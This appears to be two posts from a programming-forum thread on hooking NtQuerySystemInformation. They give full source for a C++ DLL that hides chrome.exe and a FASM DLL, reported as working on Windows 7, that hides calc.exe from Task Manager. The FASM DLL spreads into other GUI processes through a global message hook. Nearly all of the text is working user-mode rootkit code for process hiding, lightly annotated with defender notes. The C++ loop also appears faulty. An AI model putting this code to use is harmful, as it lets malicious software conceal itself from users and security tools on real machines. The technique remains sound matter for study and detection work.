







API Hooking Differing across APIs? (NtQuerySystemInformation Hook)
RE: API Hooking Differing across APIs? (NtQuerySystemInformation Hook) #11
I am on a 32-bit OS, so I cannot be writing to a 64-bit process. My current OS is Windows 7 Professional 32-bit. And I am not sure; I only recently started using VC++ and will look into it further. Here is the full DLL source code:

Code:
// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"

// NTSTATUS value the hook compares the forwarded call's result against.
#define STATUS_SUCCESS (NTSTATUS)0x000000000L

// Leading fields of one entry in the SystemProcessInformation buffer.
// Entries are chained by NextEntryOffset (0 marks the last entry); the hook
// below reads only NextEntryOffset and ImageName, the other fields just
// fix the offsets.
typedef struct __SYSTEM_PROCESS_INFORMATION
{
    ULONG NextEntryOffset;
    ULONG NumThreads;
    LARGE_INTEGER Reserved[3];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    ULONG BasePriority;
    HANDLE ProcessId;
    HANDLE InheritedFromProcessId;
} __SYSTEM_PROCESS_INFORMATION,*__PSYSTEM_PROCESS_INFORMATION;

// Prototype of ntdll!NtQuerySystemInformation (WINAPI = stdcall on x86).
typedef NTSTATUS (WINAPI* NTQSI_Type)(__in      SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                      __inout   PVOID SystemInformation,
                                      __in      ULONG SystemInformationLength,
                                      __out_opt PULONG ReturnLength);

// Address of the ntdll export as resolved by Hook() via GetProcAddress.
// The same address is the patch location written by Hook() and restored
// by Unhook(); no separate copy of the original code is kept here.
NTQSI_Type oNtQuerySystemInformation;

// Replacement for NtQuerySystemInformation installed by Hook().
// Forwards every call through oNtQuerySystemInformation and, when the
// caller asked for SystemProcessInformation and the call succeeded,
// rewrites the returned list in place: an entry whose ImageName matches
// L"chrome.exe" is unlinked by folding its NextEntryOffset into the previous
// entry's. The status of the forwarded call is returned unchanged.
// Defender note: the edit is made in the caller's own buffer after ntdll
// filled it, inside this process only; any enumeration that does not pass
// through this patched entry point still lists the process.
_declspec(dllexport) NTSTATUS WINAPI hNtQuerySystemInformation(__in      SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                          __inout   PVOID SystemInformation,
                                          __in      ULONG SystemInformationLength,
                                          __out_opt PULONG ReturnLength)
{
    // Let the real function fill the buffer; everything below edits its output.
    NTSTATUS status = oNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);

    // Only the process list is filtered; every other class passes through untouched.
    if (SystemInformationClass == SystemProcessInformation && status == STATUS_SUCCESS)
    {
        // piCur: last entry kept in the chain; piNext: entry under test.
        __PSYSTEM_PROCESS_INFORMATION piCur = NULL;
        __PSYSTEM_PROCESS_INFORMATION piNext = (__PSYSTEM_PROCESS_INFORMATION)SystemInformation;

        do
        {
            piCur = piNext;
            piNext = (__PSYSTEM_PROCESS_INFORMATION)SystemInformation;

            // ImageName.Length is passed as the character count for wcsncmp.
            if (!wcsncmp(piNext->ImageName.Buffer, L"chrome.exe", piNext->ImageName.Length))
            {
                // Unlink piNext: extend piCur's offset over it (0 = end of list).
                if (piNext->NextEntryOffset == 0)
                    piCur->NextEntryOffset = 0;
                else
                    piCur->NextEntryOffset += piNext->NextEntryOffset;

                // Stay on the kept entry so the next hop starts from it.
                piNext = piCur;
            }
        }
        while(piCur->NextEntryOffset != 0);   // NextEntryOffset == 0 marks the last entry
    }

    return status;
}

// Exported for an external loader; DllMain() below also calls both itself.
_declspec(dllexport) DWORD WINAPI Hook(LPVOID);
_declspec(dllexport) void Unhook();

BYTE oldBytes[5] = {0};   // original first 5 bytes of the export, saved by Hook()
BYTE JMP[5] = {0};        // E9 + rel32 patch assembled by Hook()

DWORD oldProtect;         // page protection in force before Hook() made the export RWX

// Installs the inline patch: overwrites the first 5 bytes of
// ntdll!NtQuerySystemInformation with a relative jmp (E9 rel32) to func.
// func: address of the replacement (DllMain passes hNtQuerySystemInformation).
// Returns 0 once the patch has been attempted, 1 if the export could not
// be resolved. Side effects: saves the overwritten bytes in oldBytes, stores
// the previous page protection in oldProtect, and shows a MessageBox per step.
// Defender note: afterwards the in-memory prologue of the export differs
// from ntdll.dll on disk and the jmp lands outside ntdll; comparing the two
// is the usual user-mode inline-hook check.
_declspec(dllexport) DWORD WINAPI Hook(LPVOID func)
{
    // Resolve the export; this address is also the patch location.
    oNtQuerySystemInformation = (NTQSI_Type)GetProcAddress(GetModuleHandle(L"ntdll.dll"),"NtQuerySystemInformation");
    if (oNtQuerySystemInformation != NULL)
    {    
        MessageBox(NULL,L"Correct",L"",MB_OK);
        BYTE tmpJMP[5] = {0xE9,0x90,0x90,0x90,0x90}; // E9 rel32; the four 0x90 placeholders are filled in below
        memcpy(JMP,tmpJMP,5);
        
        // Make the code page writable for the 5-byte write; failure is only reported, not acted on.
        if (VirtualProtect((LPVOID)oNtQuerySystemInformation,5,PAGE_EXECUTE_READWRITE,&oldProtect) == FALSE)
            MessageBox(NULL,L"Error unprotecting memory",L"",MB_OK);

        // rel32 is measured from the end of the 5-byte jmp. DWORD arithmetic
        // assumes 32-bit pointers, which matches the poster's x86 build.
        DWORD Addr = (DWORD)func - (DWORD)oNtQuerySystemInformation - 5;

        // Copy rel32 little-endian into bytes 1..4 of the patch.
        for (int i=0;i<4;++i)
            JMP[i+1] = ((BYTE*)&Addr)[i];
        
        // Keep the bytes being overwritten so Unhook() can put them back.
        memcpy(oldBytes,(LPVOID)oNtQuerySystemInformation,5);

        // Write the patch into this process's own copy of ntdll.
        if (!WriteProcessMemory(GetCurrentProcess(),(LPVOID)oNtQuerySystemInformation,(LPCVOID)JMP,5,NULL))
            MessageBox(NULL,L"Unable to write to process memory space",L"",MB_OK);

        // Restore the previous protection; the NULL discards the old value.
        VirtualProtect((LPVOID)oNtQuerySystemInformation,5,oldProtect,NULL);

        // NULL base/size: not limited to the patched range -- check the documented meaning.
        FlushInstructionCache(GetCurrentProcess(),NULL,NULL);

        // Reached whether or not the write above succeeded.
        return 0;
    }
    return 1;
}

// Copies the 5 saved bytes back over the export.
// NOTE(review): no VirtualProtect here and no check that Hook() resolved the
// export (oNtQuerySystemInformation may be NULL) or saved anything. Hook()
// restored the original page protection before returning, so this plain
// memcpy presumably needs that protection to permit writes -- confirm.
_declspec(dllexport) void Unhook()
{
    memcpy((LPVOID)oNtQuerySystemInformation,oldBytes,5);
}

// DLL entry point: installs the patch on process attach and restores it on
// process detach. Always returns TRUE, so the DLL stays loaded even when
// Hook() reports failure.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Hook()'s return value (1 = export not found) is ignored.
        Hook(&hNtQuerySystemInformation);
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        // Runs even if Hook() never patched anything (see Unhook).
        Unhook();
        break;
    }
    return TRUE;
}


RE: API Hooking Differing across APIs? (NtQuerySystemInformation Hook) #12
This works for me on a 32-bit OS; tested on Win7.
The example works by hiding calc.exe from taskmgr.exe.

Code:
format PE GUI 4.0 DLL            ; 32-bit PE DLL; DllEntryPoint below is the entry
entry DllEntryPoint

include 'win32ax.inc'            ; proc/stdcall/.if macros and API constants



; 6-byte absolute jump written over the start of NtQuerySystemInformation:
;   push imm32   (68 xx xx xx xx)
;   ret          (C3)
; PushArg is filled with the address of NewZQSI by SetHookZQSI.
struct far_jmp
  PushOp    db  0x68
  PushArg   dd  ?
  RetOp     db  0xc3
ends

; The patch bytes themselves. Declared before any 'section' directive, so
; they sit in fasm's default section; SetHookZQSI stores into FAR_JUMP at
; run time, which presumably requires that section to be writable -- confirm.
FAR_JUMP   far_jmp


;-----------------------------------------------------------------------
; HideProcess(ProcName, Tasks)   -- stdcall
; In:   ProcName = pointer to a NUL-terminated UTF-16 image name
;       Tasks    = SYSTEM_PROCESSES buffer as filled by
;                  NtQuerySystemInformation(SystemProcessInformation)
; Out:  nothing meaningful in eax
; Walks the list via NextEntryDelta and, at the first entry whose
; ProcessName.Buffer compares equal (lstrcmpiW, case-insensitive) to
; ProcName, adds that entry's delta onto the previous entry's delta, so a
; reader walking the list afterwards steps over it. Only the first match
; is unlinked; the walk stops there.
; Clobbers esi, edi, ecx, edx, eax (the caller NewZQSI wraps this call in
; pusha/popa).
;-----------------------------------------------------------------------
proc HideProcess,ProcName:dword, Tasks:dword
    mov     esi, dword [Tasks]               ; esi = current entry
@@:
    stdcall [lstrcmpiW], [esi+SYSTEM_PROCESSES.ProcessName.Buffer], [ProcName]
    cmp     eax, 0h                          ; eax = 0 when the names match
    jz      @@Found
    mov     ecx, dword [esi]                 ; ecx = NextEntryDelta; 0 = last entry
    cmp     ecx, 0h
    jz      @@End
    mov     edi, esi                         ; edi = previous (kept) entry
    add     esi, ecx                         ; advance to the next entry
    jmp     @b
@@Found:      
    mov     edx, dword [esi]                 ; edx = matched entry's NextEntryDelta
    add     dword [edi], edx                 ; prev.NextEntryDelta += it -> matched entry is skipped
@@End:
    ret
endp

;-----------------------------------------------------------------------
; NewZQSI(P1,P2,P3,P4)   -- stdcall, the same four dword arguments as
; NtQuerySystemInformation(SystemInformationClass, SystemInformation,
; SystemInformationLength, ReturnLength). Control arrives here through the
; push/ret patch installed by SetHookZQSI.
;   1. put the 6 saved original bytes (OldCode) back over the export,
;   2. call the real function with the caller's arguments,
;   3. re-apply the FAR_JUMP patch,
;   4. if P1 = 5 (SystemProcessInformation) and eax <= 3fffffffh, unlink
;      szFileToHide from the returned list (HideProcess).
; Returns eax = the real function's status; pusha/popa preserve it across
; steps 3-4. INVALID_HANDLE_VALUE (-1) is the current-process pseudo-handle.
; Note: at the 'cmp eax' below eax holds the BOOL returned by the second
; WriteProcessMemory, not the NTSTATUS -- the status was already saved by pusha.
;-----------------------------------------------------------------------
proc  NewZQSI,P1:dword , P2:dword , P3:dword , P4:dword
      local   Bytes:DWORD                    ; receives lpNumberOfBytesWritten
      stdcall [WriteProcessMemory], INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], addr OldCode, 6, addr Bytes
      stdcall [ZwQuerySystemInformation], [P1], [P2], [P3], [P4]
      pusha                                  ; save the status in eax (and all other regs)
      stdcall [WriteProcessMemory], INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], FAR_JUMP, 6, addr Bytes
      cmp     dword [P1], 05h                ; 5 = SystemProcessInformation
      jnz     done
      cmp     eax, 03fffffffh                ; eax = WriteProcessMemory's return here (see header)
      ja      done
      stdcall HideProcess, szFileToHide, [P2] ; P2 = the caller's output buffer
done:
      popa                                   ; restores the saved status into eax
      ret
endp

; WH_GETMESSAGE hook procedure registered by DllEntryPoint. It does nothing
; and returns 0 without calling CallNextHookEx; the hook exists only so the
; system maps this DLL into the processes that receive messages.
proc  HookProc, Code: dword, wParam: dword, lParam: dword
      mov        eax, 0h
      ret
endp

; Installs the patch on ntdll!NtQuerySystemInformation in this process:
; saves the export's first 6 bytes into OldCode, builds FAR_JUMP
; (push NewZQSI / ret) and writes it over those bytes.
; [ZwQuerySystemInformation] is the IAT slot, i.e. the export's address.
; No VirtualProtect is done; WriteProcessMemory on the current process is
; relied on to deal with the page protection -- confirm.
; PushOp/RetOp are already 68h/C3h from the struct initialisers; the two
; byte stores here just re-assert them.
; Defender note: after this the export's prologue no longer matches the
; on-disk ntdll image and ends in a ret into this DLL.
proc  SetHookZQSI
      local      Bytes: DWORD                ; receives lpNumberOfBytesRead/Written
      stdcall    [ReadProcessMemory], INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], addr OldCode, 6, addr Bytes
      mov        [FAR_JUMP.PushOp], 068h     ; push imm32
      mov        [FAR_JUMP.PushArg],NewZQSI  ; imm32 = address of the replacement
      mov        [FAR_JUMP.RetOp], 0c3h      ; ret -> jumps to NewZQSI
      stdcall    [WriteProcessMemory],INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], FAR_JUMP, 6, addr Bytes
      ret
endp


; DllEntryPoint(hinstDLL, fdwReason, lpvReserved)
; fdwReason 1 = DLL_PROCESS_ATTACH: when hDLL is still 0 (presumably the
; first attach in this process -- confirm .data is zero-initialised), record
; the module handle and install a global WH_GETMESSAGE hook (thread id 0 =
; all threads), which is what carries this DLL into other GUI processes;
; then patch NtQuerySystemInformation in the current process.
; fdwReason 0 = DLL_PROCESS_DETACH: remove the message hook. The inline
; patch on the export is not restored here.
; Returns eax = 1 (TRUE). hMutex and trId are declared but never used.
proc DllEntryPoint hinstDLL,fdwReason,lpvReserved

     local   hMutex:DWORD
     local   trId:DWORD

     .if [fdwReason] = 1
     .if [hDLL] = 0

      mov        eax, [hinstDLL]              ; hDLL = hinstDLL
      mov        [hDLL], eax
      mov        eax, dword [hinstDLL]        ; the same store repeated
      mov        dword [hDLL], eax
      stdcall    [SetWindowsHookExA], WH_GETMESSAGE, HookProc, [hDLL], 0
      mov        [hHookMsg], eax              ; eax = HHOOK, kept for detach
     .endif
     call       SetHookZQSI                   ; direct call, no arguments

.elseif [fdwReason] = 0
      stdcall    [UnhookWindowsHookEx], [hHookMsg]

.endif
      xor        eax, eax
      inc        eax                          ; eax = 1 -> TRUE
      ret
      endp

; Layouts for the SystemProcessInformation buffer (32-bit ntdll).
; HideProcess reads only SYSTEM_PROCESSES.NextEntryDelta and
; SYSTEM_PROCESSES.ProcessName.Buffer; the remaining fields only fix offsets.
struct IO_COUNTERS
    ReadOperationCount         dq  ?
    WriteOperationCount        dq  ?
    OtherOperationCount        dq  ?
    ReadTransferCount          dq  ?
    WriteTransferCount         dq  ?
    OtherTransferCount         dq  ?
ends

struct VM_COUNTERS
    PeakVirtualSize            dd  ?
    VirtualSize                dd  ?
    PageFaultCount             dd  ?
    PeakWorkingSetSize         dd  ?
    WorkingSetSize             dd  ?
    QuotaPeakPagedPoolUsage    dd  ?
    QuotaPagedPoolUsage        dd  ?
    QuotaPeakNonPagedPoolUsage dd  ?
    QuotaNonPagedPoolUsage     dd  ?
    PagefileUsage              dd  ?
    PeakPagefileUsage          dd  ?
ends

; Local copy of the native UNICODE_STRING (lengths are byte counts in the
; Windows definition); Buffer is a pointer to UTF-16 text.
struct UNICODE_STRING
    Len                        dw  ?
    MaximumLen                 dw  ?
    Buffer                     dd  ?
ends

struct TClientID
    UniqueProcess              dd  ?
    UniqueThread               dd  ?
ends

struct SYSTEM_THREADS
    KernelTime                  dq  ?
    UserTime                    dq  ?
    CreateTime                  dq  ?
    WaitTime                    dd  ?
    StartAddress                dd  ?
    ClientId                    TClientID <?>
    Priority                    dd  ?
    BasePriority                dd  ?
    ContextSwitchCount          dd  ?
    State                       dd  ?
    WaitReason                  dd  ?
ends

; One process entry. NextEntryDelta is the byte offset to the next entry
; (0 = last); it is what HideProcess adjusts to unlink an entry.
struct SYSTEM_PROCESSES
    NextEntryDelta              dd  ?
    ThreadCount                 dd  ?
    Reserved1                   dd  6 dup(?)
    CreateTime                  dq  ?
    UserTime                    dq  ?
    KernelTime                  dq  ?
    ProcessName                 UNICODE_STRING <?>
    BasePriority                dd  ?
    ProcessId                   dd  ?
    InheritedFromProcessId      dd  ?
    HandleCount                 dd  ?
    Reserved2                   dd  2 dup (0)
    VmCounters                  VM_COUNTERS <?>
    IoCounters                  IO_COUNTERS <?>
    Threads                     SYSTEM_THREADS <?>   ; first thread record only; the entry holds ThreadCount of them
ends

section '.data' data readable writeable

OldCode          db  6 dup(?)   ; original first 6 bytes of the export, saved by SetHookZQSI

pZQSI            dd ?           ; not referenced anywhere in this listing
hDLL             dd ?           ; this module's HINSTANCE, set on first process attach
hHookMsg         dd ?           ; HHOOK from SetWindowsHookExA, released on detach


szFileToHide    du 'calc.exe',000   ; UTF-16 image name matched by HideProcess (case-insensitive), NUL-terminated


section '.idata' import data readable writeable
library kernel32,'kernel32.dll',user32,'user32.dll',ntdll,'ntdll.dll'

    ; The IAT slot is named ZwQuerySystemInformation but is bound to the
    ; NtQuerySystemInformation export, so [ZwQuerySystemInformation] in the
    ; code above is that export's address and the patch target.
    import ntdll,\
         ZwQuerySystemInformation,'NtQuerySystemInformation'

    include "%include%/api/kernel32.inc"   ; lstrcmpiW, ReadProcessMemory, WriteProcessMemory
    include "%include%/api/user32.inc"     ; SetWindowsHookExA, UnhookWindowsHookEx

; Base relocations: the DLL is loaded at a different base in each process it is mapped into.
section '.reloc' fixups data readable discardable







